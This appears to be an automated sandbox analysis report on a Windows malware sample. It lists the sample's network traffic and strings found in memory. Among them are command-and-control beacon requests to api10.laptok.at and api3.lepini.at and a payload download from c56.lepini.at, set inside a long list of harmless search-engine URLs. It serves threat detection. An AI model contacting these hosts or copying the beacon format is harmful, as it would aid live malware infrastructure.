HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 47.241.19.44 47.241.19.44

Source: global traffic	HTTP traffic detected: GET /api1/eo_2BIlYIakkFjtKlYh34Ss/HzB35UuLk7/cRenSoj_2Bmnd8Dj2/x181tJXN27RB/cqhJWTWpoyc/WU_2BHDqXNQHyF/aDmY5Jw7iTMS8Sm28wuKE/aE7o1rgRq9Zga98a/Lfk5mVpEscNl_2B/PEL_2BzPSrlVxe7hjg/VwIhIVlrD/Q75QLCo1R_2FGgXCAPcg/a82_2BpHTzLUJRE2skc/NrjfTQynui55314yUu2IJ7/NuVMlNbXu5eLz/t14q6jvB/NktWJXjAjAGBXHfWPm_0A_0/DDQhZDtGQu/HIp9aDbbcUD_2FJMS/dglTkO1jgRVp8/MzuzdPBBs/X HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api1/XO7QtVtOxvAU4dkxK/MUnrl2paNhM_/2FhuHDAlai0/NYk3fgMRD21K6x/275eVNVSoFX1z_2Fdgzow/MjYIlNw6pXOFZtoH/ck22OsEBi4g5A21/99QRfbFqCod1fjkNsK/XxVSIrdVG/7FHa2ER9Ft02LqAkeU18/04NkD5rjB5JZqGFdQLM/maVmTCXIlwp0EX02aBt_2F/Clo4eegFdQ1lk/P1pW4ZJ5/wIbd6IdM2um9GQiRmu4HTYW/_2FpOuqNYz/HTi5jYJ7JeAd_0A_0/Dg9X8gZJHmh_/2B_2FHgF5eg/hemqUNvmE05Kam/e7yAaZ9rb60RXTZYuOS2q/HQUlA_2F4Fhmtp/3js HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api1/6pQLMKxXX9R7A/0Kb9p8K4/BHJoVof6Fq7pyt4TOfPymNR/ZySC71MXSL/l8MLURonpjSVljDCJ/ih2L1Bdz8irJ/_2F8lSRByE0/SM6_2BP71LZESU/h3tJD1hVHbKiwkwE2IeWs/IizA7p6En4mCz2WA/NXpt5f6m6Jvf3pc/Mrs5oQ_2FPRoyih4jN/nKDhf733I/JOO4yWaqPLDk_2FATWs4/au98UO6brkA9iK_2BJ2/m2zSLNazAj56j867SYe4xl/cUNEATTbA9T6H/G_0A_0DY/h1e_2Bl0ZjLJIZf95sH7_2B/vbmm46cNio/kWkp8HAde3SsZyg36/ZN_2BmnjrWTcHtn/70R8a3b9 HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
Source: global traffic	HTTP traffic detected: GET /api1/y593T41s/lL3TOAWpr8BAEirizPVY1nr/gHh_2FJm75/zCdiX47c4HpAxyRkT/qHLmarlSHot9/ONkJbY9gGOt/fQ6HQhMd_2B2I2/UNHWo1YbKowVIMWnTVz3S/Fy9pHKfmC1MflrBD/0HEKH0eANuLLaQi/NyVaE39P8WW680xE9C/zKHHHrqp_/2BtcUAWB7_2BpbaOT4FO/b_2BpTr1WFjW1cxH4os/NuSvnY4dMHLhOh3P7AJ4TT/NndN5S4150t5l/lDv81A2q/V_2FLzQ_2B_0A_0D_2B1i_2/FVUx_2B8Aw/gTJkpEcUGFJt7Exz1/ugevcO8oI6oRZ/xs5xjc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0Host: api3.lepini.at

Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)

Source: unknown

DNS traffic detected: queries for: api10.laptok.at

Source: unknown

Source: global traffic

Source: explorer.exe, 0000001D.00000000.383246627.0000000006FE0000.00000002.00000001.sdmp	String found in binary or memory: http://%s.com
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 0000001D.00000000.389327777.0000000008C64000.00000004.00000001.sdmp	String found in binary or memory: http://api10.laptok.at/ap
Source: explorer.exe, 0000001D.00000000.389327777.0000000008C64000.00000004.00000001.sdmp	String found in binary or memory: http://api10.laptok.at/api1/6pQLMKxXX9R7A/0Kb9p8K4/BHJoVof6Fq7pyt4TOfPymNAAZYZ
Source: explorer.exe, 0000001D.00000000.388307908.000000000891C000.00000004.00000001.sdmp, explorer.exe, 0000001D.00000000.389327777.0000000008C64000.00000004.00000001.sdmp	String found in binary or memory: http://api10.laptok.at/api1/6pQLMKxXX9R7A/0Kb9p8K4/BHJoVof6Fq7pyt4TOfPymNR/ZySC71MXSL/l8MLURonpjSVlj
Source: explorer.exe, 0000001D.00000000.389327777.0000000008C64000.00000004.00000001.sdmp	String found in binary or memory: http://api10.laptok.at/api1/XO7QtVtOxvAU4dkxK/MUnrl2paNhM_/2FhuHDAlai0/NYk3fgMRD21K6x/275eVNVSoFX1z_
Source: explorer.exe, 0000001D.00000000.392738198.000000000DC5F000.00000004.00000001.sdmp	String found in binary or memory: http://api10.laptok.at/api1/eo_2BIlYIakkFjtKlYh34Ss/HzB35UuLk7/cRenSoj_2Bmnd8Dj2/x181tJXN27RB/cqhJWT
Source: explorer.exe, 0000001D.00000002.518168118.00000000053C4000.00000004.00000001.sdmp	String found in binary or memory: http://api3.lepini.at/api1/Tnjw5UXPt/L5vQXVeFjcg_2Bj0ZUjt/9bFRVhN6pC9d2H18KaD/RGYbWbOkYjL_2F2HT335i7
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 0000001D.00000000.383246627.0000000006FE0000.00000002.00000001.sdmp	String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 0000001D.00000000.388809444.0000000008B54000.00000004.00000001.sdmp	String found in binary or memory: http://c56.lepini.at/jvassets/xI/t64.dat
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: loaddll32.exe, powershell.exe, 00000013.00000003.358522767.0000022F9D7D0000.00000004.00000001.sdmp, control.exe, 0000001A.00000003.354083922.0000020E4A350000.00000004.00000001.sdmp, explorer.exe, 0000001D.00000002.511989031.0000000003B8E000.00000004.00000001.sdmp, RuntimeBroker.exe, 0000001E.00000002.510030791.000002413CA4E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000020.00000002.502898897.000001E7666AE000.00000004.00000001.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txt
Source: loaddll32.exe, 00000000.00000002.370796430.0000000002810000.00000040.00000001.sdmp, powershell.exe, 00000013.00000003.358522767.0000022F9D7D0000.00000004.00000001.sdmp, control.exe, 0000001A.00000003.354083922.0000020E4A350000.00000004.00000001.sdmp, explorer.exe, 0000001D.00000002.511989031.0000000003B8E000.00000004.00000001.sdmp, RuntimeBroker.exe, 0000001E.00000002.510030791.000002413CA4E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000020.00000002.502898897.000001E7666AE000.00000004.00000001.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: powershell.exe, 00000013.00000003.369200959.0000022F9DAA8000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://home.altervista.org/favicon.ico
Source: loaddll32.exe, 00000000.00000002.370796430.0000000002810000.00000040.00000001.sdmp, loaddll32.exe, 00000000.00000003.340776035.0000000002850000.00000004.00000001.sdmp, powershell.exe, 00000013.00000003.358522767.0000022F9D7D0000.00000004.00000001.sdmp, control.exe, 0000001A.00000003.354083922.0000020E4A350000.00000004.00000001.sdmp, explorer.exe, 0000001D.00000002.511989031.0000000003B8E000.00000004.00000001.sdmp, RuntimeBroker.exe, 0000001E.00000002.510030791.000002413CA4E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000020.00000002.502898897.000001E7666AE000.00000004.00000001.sdmp	String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&q=
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://msk.afisha.ru/
Source: powershell.exe, 00000013.00000003.316077388.0000022F8657E000.00000004.00000001.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: powershell.exe, 00000013.00000003.315876431.0000022F863B7000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://price.ru/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://sads.myspace.com/
Source: powershell.exe, 00000013.00000002.373535807.0000022F84FD1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.about.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.alice.it/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.in/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.chol.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.daum.net/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.daum.net/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.es/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.fr/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.in/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.it/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.empas.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.empas.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.espn.go.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&q=
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&q=
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&q=
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.nate.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.naver.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/
